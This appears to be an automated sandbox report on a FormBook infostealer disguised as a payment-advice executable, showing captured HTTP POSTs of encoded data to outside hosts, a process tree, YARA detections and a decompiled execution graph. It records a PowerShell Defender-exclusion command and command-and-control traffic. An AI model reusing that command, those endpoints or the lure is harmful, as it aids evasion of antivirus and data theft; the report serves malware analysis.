                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.comect.online/hmf8/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 6b 45 59 63 2f 74 4b 57 39 6e 43 57 6c 75 51 5a 72 47 42 74 37 67 42 78 50 35 64 75 6f 38 44 78 43 46 65 4e 50 6f 79 52 4b 36 54 57 73 4e 4e 43 41 54 4c 79 79 54 2f 46 4f 73 65 6c 75 46 66 46 55 45 6b 2f 52 67 6b 71 67 5a 71 79 63 53 79 69 49 41 55 34 79 61 4f 6d 65 44 49 67 67 64 6e 6e 67 65 69 36 6a 77 5a 74 78 30 70 31 44 5a 59 61 39 69 51 57 30 42 6b 71 47 4b 4c 64 46 34 37 6b 79 71 61 61 66 4c 69 76 2f 47 75 63 31 53 61 72 77 72 66 58 6e 5a 77 5a 78 41 48 66 2f 4d 73 6e 50 47 52 38 68 4c 41 44 53 35 5a 62 2f 7a 2f 4a 42 33 78 41 76 50 62 59 56 55 59 45 67 75 4b 75 55 71 59 4f 6b 78 57 66 45 4e 42 56 5a 49 67 79 4c 48 31 76 65 63 4e 75 63 41 5a 37 43 31 68 69 44 48 73 6c 58 66 55 56 35 76 76 2f 64 50 66 6b 45 66 36 55 4a 39 6a 46 6d 68 4a 42 43 4d 70 53 2f 78 43 6e 61 6e 61 2f 37 6b 35 69 58 68 2b 36 34 78 4d 6d 64 33 55 76 72 37 62 63 47 78 6a 61 71 65 4c 67 36 69 70 74 75 67 56 35 70 66 71 50 59 78 6e 2b 4d 6d 6c 48 6f 34 72 69 4c 4a 38 4a 36 6a 50 77 49 77 32 76 6a 52 43 55 32 71 [TRUNCATED]
                                                                                                                                          Data Ascii: q0C=kEYc/tKW9nCWluQZrGBt7gBxP5duo8DxCFeNPoyRK6TWsNNCATLyyT/FOseluFfFUEk/RgkqgZqycSyiIAU4yaOmeDIggdnngei6jwZtx0p1DZYa9iQW0BkqGKLdF47kyqaafLiv/Guc1SarwrfXnZwZxAHf/MsnPGR8hLADS5Zb/z/JB3xAvPbYVUYEguKuUqYOkxWfENBVZIgyLH1vecNucAZ7C1hiDHslXfUV5vv/dPfkEf6UJ9jFmhJBCMpS/xCnana/7k5iXh+64xMmd3Uvr7bcGxjaqeLg6iptugV5pfqPYxn+MmlHo4riLJ8J6jPwIw2vjRCU2qEAnEGqoHdmK8C3WwWTN2A4QaKrxlfm8erFbSiciGgUt+iTULD+lgRkr7JQeu0C29p6vGlrsaNgjXNTbaRF9/Tzmn+ZQccLjDp6SqDh1ouECJUpZll0cbovSj9SNnrZBxzzSgqDS3AiCmDbjTrQIrfZ+//Ydjlg9RrIX0g2YhZR2ocWWdG5WAmYcEShEDqqwqpHo8M/Uj4T/yFxsE8W644VdmHTHRmYMl/6z/zQoU0iC1RYoPcDYBoFQuWdny2e3QnFYTt02DBM0JE5BVQ3JLwl7Bift8Kktrkr267QtloXa7HfB9ZM00v9PnsDvY2ReapbPS5ruimaohUGB7L5scarsMRPN4ETWzb5YX3mIAr1ZPaA5ECUWDObAJBRiGpoZKDT3KOi6562FUKgoeCpSA4q2mckxgG9iL8ccL8Lbj5z02ZddjWoHRg8F6NE9vsBEBxjI7Wnimcx5hAJ2jrj9ZfsUayKVuA2WJwwrCoPTvA/wLxrBSXozRc6YOIHgWLlBQclBSMqvBThi45tfZA/GOZv0XB151XfVnSh9zyj9GZb1cDSJFn6xvuXihndoMYJL/ViHR6XD2aaiDbB1amT2xY/FtQHanSbUl6OsL1y08ABI884KZAVgUuwtiWU31IHOevwNfznqn6MkWrdmlCL+10nR3KqytehYUz9 [TRUNCATED]


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          24192.168.2.450029124.6.61.130804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:47.837877035 CET494OUTGET /hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ= HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.comect.online
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Dec 9, 2024 08:50:49.794400930 CET464INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Mon, 09 Dec 2024 07:50:49 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                          X-Redirect-By: WordPress
                                                                                                                                          Location: http://comect.online/hmf8/?0vE=z2LXL2HhYNX8&q0C=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=
                                                                                                                                          Content-Length: 0
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          25192.168.2.4500323.33.130.190804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:55.438766003 CET767OUTPOST /6wmy/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.emirates-visa.net
                                                                                                                                          Origin: http://www.emirates-visa.net
                                                                                                                                          Content-Length: 200
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.emirates-visa.net/6wmy/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 32 51 65 73 75 51 39 51 57 68 37 7a 6b 62 6b 6d 2b 34 35 59 6e 47 79 4e 50 69 51 6d 58 71 6e 4f 2f 62 54 6c 69 78 48 58 68 42 49 57 54 35 38 50 75 37 68 2b 45 43 44 44 6b 42 71 37 7a 69 47 2b 42 37 54 38 4d 4e 57 6b 70 55 59 63 58 69 36 46 31 55 31 79 46 4c 59 57 50 76 71 78 72 33 4b 66 70 61 39 63 38 6e 47 6a 43 56 52 4c 54 58 42 4e 51 52 52 6c 33 35 58 4c 53 52 79 77 37 78 68 41 74 52 4c 62 78 59 30 49 31 38 74 55 6e 4f 66 42 41 62 48 6f 53 69 2f 46 68 4c 47 34 31 6a 44 46 55 4a 31 63 79 68 72 66 4c 76 76 4c 6d 63 75 6a 4c 75 36 33 70 6b 61 71 6f 4b 52 67 64 41 2f 72 43 41 3d 3d
                                                                                                                                          Data Ascii: q0C=2QesuQ9QWh7zkbkm+45YnGyNPiQmXqnO/bTlixHXhBIWT58Pu7h+ECDDkBq7ziG+B7T8MNWkpUYcXi6F1U1yFLYWPvqxr3Kfpa9c8nGjCVRLTXBNQRRl35XLSRyw7xhAtRLbxY0I18tUnOfBAbHoSi/FhLG41jDFUJ1cyhrfLvvLmcujLu63pkaqoKRgdA/rCA==
                                                                                                                                          Dec 9, 2024 08:50:56.542701960 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                          content-length: 0
                                                                                                                                          connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          26192.168.2.4500333.33.130.190804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:50:58.097105026 CET787OUTPOST /6wmy/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.emirates-visa.net
                                                                                                                                          Origin: http://www.emirates-visa.net
                                                                                                                                          Content-Length: 220
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.emirates-visa.net/6wmy/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 32 51 65 73 75 51 39 51 57 68 37 7a 6b 2f 59 6d 79 2f 74 59 6c 6d 79 4f 52 53 51 6d 42 61 6e 4b 2f 62 50 6c 69 77 44 48 67 7a 73 57 55 64 73 50 76 35 46 2b 42 43 44 44 38 52 71 79 39 43 47 70 42 37 66 65 4d 4e 36 6b 70 55 4d 63 58 6d 71 46 31 6e 64 7a 4b 37 59 59 61 2f 71 33 76 33 4b 66 70 61 39 63 38 6e 53 4a 43 56 5a 4c 54 6b 70 4e 42 41 52 6d 30 35 58 55 52 52 79 77 77 52 68 36 74 52 4b 34 78 63 73 79 31 2b 6c 55 6e 50 50 42 48 4b 48 76 63 69 2b 4f 73 72 48 47 6b 47 2b 30 64 38 4d 55 37 67 58 42 4e 2b 33 78 71 36 6a 35 61 66 62 67 37 6b 2b 5a 31 4e 59 55 51 44 43 69 5a 46 78 39 50 6f 6e 4e 65 2b 42 34 6f 47 57 56 67 5a 44 2f 36 70 73 3d
                                                                                                                                          Data Ascii: q0C=2QesuQ9QWh7zk/Ymy/tYlmyORSQmBanK/bPliwDHgzsWUdsPv5F+BCDD8Rqy9CGpB7feMN6kpUMcXmqF1ndzK7YYa/q3v3Kfpa9c8nSJCVZLTkpNBARm05XURRywwRh6tRK4xcsy1+lUnPPBHKHvci+OsrHGkG+0d8MU7gXBN+3xq6j5afbg7k+Z1NYUQDCiZFx9PonNe+B4oGWVgZD/6ps=
                                                                                                                                          Dec 9, 2024 08:50:59.177483082 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                          content-length: 0
                                                                                                                                          connection: close


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          27192.168.2.4500343.33.130.190804136C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 9, 2024 08:51:00.752921104 CET10869OUTPOST /6wmy/ HTTP/1.1
                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                          Accept-Language: en-US,en
                                                                                                                                          Host: www.emirates-visa.net
                                                                                                                                          Origin: http://www.emirates-visa.net
                                                                                                                                          Content-Length: 10300
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Connection: close
                                                                                                                                          Referer: http://www.emirates-visa.net/6wmy/
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                          Data Raw: 71 30 43 3d 32 51 65 73 75 51 39 51 57 68 37 7a 6b 2f 59 6d 79 2f 74 59 6c 6d 79 4f 52 53 51 6d 42 61 6e 4b 2f 62 50 6c 69 77 44 48 67 7a 6b 57 55 71 45 50 75 59 46 2b 43 43 44 44 69 42 71 2f 39 43 47 52 42 36 33 61 4d 4e 48 47 70 53 49 63 46 55 69 46 33 57 64 7a 52 4c 59 59 59 2f 71 79 72 33 4b 77 70 62 4e 59 38 6e 43 4a 43 56 5a 4c 54 69 56 4e 52 68 52 6d 34 5a 58 4c 53 52 79 47 37 78 67 30 74 52 53 47 78 63 67 69 32 4b 52 55 6b 76 2f 42 43 34 76 76 55 69 2b 4d 67 4c 48 4f 6b 47 36 76 64 38 34 79 37 67 7a 6e 4e 2b 54 78 37 2b 32 4e 50 4e 62 47 74 30 4f 52 74 39 34 72 54 44 43 53 41 46 4e 5a 49 49 33 56 43 65 39 67 79 57 75 52 6c 34 54 6b 75 63 30 50 7a 4d 6f 45 64 66 47 4f 71 2b 62 73 73 56 78 61 62 2b 41 6e 75 2f 37 69 33 73 5a 43 4c 52 56 39 4e 6f 68 4e 55 4a 42 44 38 7a 36 30 78 57 51 58 4c 41 6a 50 4f 4d 4f 5a 79 65 6c 79 45 33 48 49 36 66 78 37 2f 7a 63 56 39 51 4d 55 44 61 6b 68 74 30 68 31 38 59 4f 72 44 4c 6d 47 30 54 66 4d 38 49 6c 46 6b 33 5a 36 6c 6b 41 34 6a 44 6c 72 32 42 53 72 67 46 [TRUNCATED]
                                                                                                                                          Data Ascii: q0C=2QesuQ9QWh7zk/Ymy/tYlmyORSQmBanK/bPliwDHgzkWUqEPuYF+CCDDiBq/9CGRB63aMNHGpSIcFUiF3WdzRLYYY/qyr3KwpbNY8nCJCVZLTiVNRhRm4ZXLSRyG7xg0tRSGxcgi2KRUkv/BC4vvUi+MgLHOkG6vd84y7gznN+Tx7+2NPNbGt0ORt94rTDCSAFNZII3VCe9gyWuRl4Tkuc0PzMoEdfGOq+bssVxab+Anu/7i3sZCLRV9NohNUJBD8z60xWQXLAjPOMOZyelyE3HI6fx7/zcV9QMUDakht0h18YOrDLmG0TfM8IlFk3Z6lkA4jDlr2BSrgFVRViTZHroTQDVyotGDXVLLG/VKaf20C6LdysQP0OsoOIgUx1iYmtZNN93Lr5jXB25orIwt0cL6mg/6yv+P+uFV1FuVoMyi5I+RvM8tgQrnOloHQ0iS57Ob1vX95t6vfAemf33Q0jpSIfd03XR7tYp7gxZ4gYj7tdto3m45NDVD1IHvHML6yhAchIFk8iHFXhkBi9R2jx6v/w0eXf7ikm6VjQxTViv03pMMNKaIwhpWRSlnCMV8rVIrgIMhUNVHIuOgId7f2iOARMt3uhutP4MnK3j5avzuNnZZGd6DB2jaWyWVfv5xGKWdEcTy9i9+W32Wdi+2gU6oWsRVCb9sDhMA20aPdWVp6o/PxXAzplEFeH/ayqyZCWxLhe7ukYo0/+9yHZnEx1gwvCNkRSuwl5AO5xtURRJicdPbL/A2Y1ygTbKFeos7PeoQ+5C6YBp73oKQz9tsx+MpzQIJO4DnfehmWV2Tvcx3u8PEQkHDhicb4sHDxluJ4O3PxfSE9/WQxLV+qab9iLBXfrNIAHn4Hy0C7JEQVQNSpsOItW9L1h+GkxChC4knqXsWGF/E1YVVRDukfBN1k2ny8TfpPELNdccQ+dFSvPzGlAAZb/0HD+y3Ix2qboTg8jIc+qj0jTsDCukMkBfKdadbq6DNHXAq1ijAMYnBAw5v1jTb [TRUNCATED]
                                                                                                                                          Dec 9, 2024 08:51:01.966676950 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                          content-length: 0
                                                                                                                                          connection: close


                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Click to jump to process

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:02:47:54
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                                                                                                                                          Imagebase:0x420000
                                                                                                                                          File size:734'208 bytes
                                                                                                                                          MD5 hash:CEDBF1D5C1BC7D923F885CD24BF225C1
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:02:48:11
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                                                                                                                                          Imagebase:0x520000
                                                                                                                                          File size:433'152 bytes
                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:02:48:11
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe"
                                                                                                                                          Imagebase:0xbe0000
                                                                                                                                          File size:734'208 bytes
                                                                                                                                          MD5 hash:CEDBF1D5C1BC7D923F885CD24BF225C1
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2234049320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2236251999.00000000019C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2236407879.0000000002F10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:02:48:11
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:02:48:38
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe"
                                                                                                                                          Imagebase:0x770000
                                                                                                                                          File size:140'800 bytes
                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3552757960.0000000003E80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:02:48:41
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\finger.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\finger.exe"
                                                                                                                                          Imagebase:0x130000
                                                                                                                                          File size:13'824 bytes
                                                                                                                                          MD5 hash:C586D06BF5D5B3E6E9E3289F6AA8225E
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3551724394.0000000002F40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3552776156.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3552721887.0000000003720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:02:48:55
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Program Files (x86)\iqshUYCSiXfBvBIRvJylHmkibnJqmwTjpOcIRwqmcVJxhNdNXAIcoRXkmhiNOLnBbAaTHkiAFyEQWN\vTCmFjyxUmdTJX.exe"
                                                                                                                                          Imagebase:0x770000
                                                                                                                                          File size:140'800 bytes
                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3552365141.00000000014E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:02:49:08
                                                                                                                                          Start date:09/12/2024
                                                                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                          Imagebase:0x7ff6bf500000
                                                                                                                                          File size:676'768 bytes
                                                                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:11.6%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:3.2%
                                                                                                                                            Total number of Nodes:187
                                                                                                                                            Total number of Limit Nodes:9
                                                                                                                                            execution_graph 52611 25bb3b8 52612 25bb3fa 52611->52612 52613 25bb400 GetModuleHandleW 52611->52613 52612->52613 52614 25bb42d 52613->52614 52615 25b4668 52616 25b467a 52615->52616 52617 25b4686 52616->52617 52621 25b4783 52616->52621 52626 25b3e28 52617->52626 52619 25b46a5 52622 25b479d 52621->52622 52630 25b4888 52622->52630 52634 25b4883 52622->52634 52623 25b47a7 52623->52617 52627 25b3e33 52626->52627 52642 25b5d1c 52627->52642 52629 25b6ffb 52629->52619 52631 25b48af 52630->52631 52632 25b498c 52631->52632 52638 25b44b0 52631->52638 52632->52623 52636 25b48af 52634->52636 52635 25b498c 52635->52623 52636->52635 52637 25b44b0 CreateActCtxA 52636->52637 52637->52635 52639 25b5918 CreateActCtxA 52638->52639 52641 25b59db 52639->52641 52641->52641 52643 25b5d27 52642->52643 52646 25b5d3c 52643->52646 52645 25b72b5 52645->52629 52647 25b5d47 52646->52647 52650 25b5d6c 52647->52650 52649 25b739a 52649->52645 52651 25b5d77 52650->52651 52652 25b5d9c CreateWindowExW 52651->52652 52653 25b748d 52652->52653 52653->52649 52440 4d54291 52441 4d54302 52440->52441 52442 4d543ac 52440->52442 52443 4d5435a CallWindowProcW 52441->52443 52445 4d54309 52441->52445 52446 4d5113c 52442->52446 52443->52445 52448 4d51147 52446->52448 52449 4d52c69 52448->52449 52450 4d51264 CallWindowProcW 52448->52450 52449->52449 52450->52449 52451 256d01c 52452 256d034 52451->52452 52453 256d08e 52452->52453 52456 4d5113c CallWindowProcW 52452->52456 52458 4d51ea7 52452->52458 52462 4d51ea8 52452->52462 52466 4d52c13 52452->52466 52456->52453 52459 4d51ece 52458->52459 52460 4d5113c CallWindowProcW 52459->52460 52461 4d51eef 52460->52461 52461->52453 52463 4d51ece 52462->52463 52464 4d5113c CallWindowProcW 52463->52464 52465 4d51eef 52464->52465 52465->52453 52468 4d52c45 52466->52468 52469 4d52c69 52468->52469 52470 4d51264 CallWindowProcW 52468->52470 52469->52469 52470->52469 52654 25bd460 52655 25bd4a6 52654->52655 52659 25bd62f 52655->52659 52662 25bd640 52655->52662 52656 25bd593 52660 25bd66e 52659->52660 52665 25bb0b4 52659->52665 52660->52656 52663 25bb0b4 DuplicateHandle 52662->52663 52664 25bd66e 52663->52664 52664->52656 52666 25bd6a8 DuplicateHandle 52665->52666 52667 25bd73e 52666->52667 52667->52660 52499 4d56cc8 52500 4d56cf5 52499->52500 52537 4d56974 52500->52537 52503 4d56974 CreateWindowExW 52504 4d56d89 52503->52504 52505 4d56974 CreateWindowExW 52504->52505 52506 4d56dbb 52505->52506 52507 4d56974 CreateWindowExW 52506->52507 52508 4d56ded 52507->52508 52509 4d56974 CreateWindowExW 52508->52509 52510 4d56e1f 52509->52510 52511 4d56974 CreateWindowExW 52510->52511 52512 4d56e51 52511->52512 52513 4d56974 CreateWindowExW 52512->52513 52514 4d56e83 52513->52514 52515 4d56974 CreateWindowExW 52514->52515 52516 4d56eb5 52515->52516 52517 4d56974 CreateWindowExW 52516->52517 52518 4d56ee7 52517->52518 52519 4d56974 CreateWindowExW 52518->52519 52520 4d56f19 52519->52520 52541 4d56984 52520->52541 52522 4d56f4b 52523 4d56974 CreateWindowExW 52522->52523 52524 4d56f7d 52523->52524 52525 4d56974 CreateWindowExW 52524->52525 52526 4d56faf 52525->52526 52527 4d56974 CreateWindowExW 52526->52527 52528 4d56fe1 52527->52528 52529 4d56974 CreateWindowExW 52528->52529 52530 4d57013 52529->52530 52531 4d56974 CreateWindowExW 52530->52531 52532 4d57045 52531->52532 52533 4d56974 CreateWindowExW 52532->52533 52534 4d57077 52533->52534 52535 4d56974 CreateWindowExW 52534->52535 52536 4d570a9 52535->52536 52538 4d5697f 52537->52538 52539 4d56d57 52538->52539 52546 4d56a64 52538->52546 52539->52503 52542 4d5698f 52541->52542 52543 4d5999b 52542->52543 52544 25b5d9c CreateWindowExW 52542->52544 52545 25b8733 CreateWindowExW 52542->52545 52543->52522 52544->52543 52545->52543 52547 4d56a6f 52546->52547 52551 25b5d9c 52547->52551 52556 25b8733 52547->52556 52548 4d5971c 52548->52539 52553 25b5da7 52551->52553 52552 25b8a29 52552->52548 52553->52552 52561 25bcd81 52553->52561 52566 25bcd90 52553->52566 52558 25b8763 52556->52558 52557 25b8a29 52557->52548 52558->52557 52559 25bcd81 CreateWindowExW 52558->52559 52560 25bcd90 CreateWindowExW 52558->52560 52559->52557 52560->52557 52562 25bcdb1 52561->52562 52563 25bcdd5 52562->52563 52571 25bd339 52562->52571 52575 25bd348 52562->52575 52563->52552 52567 25bcdb1 52566->52567 52568 25bcdd5 52567->52568 52569 25bd339 CreateWindowExW 52567->52569 52570 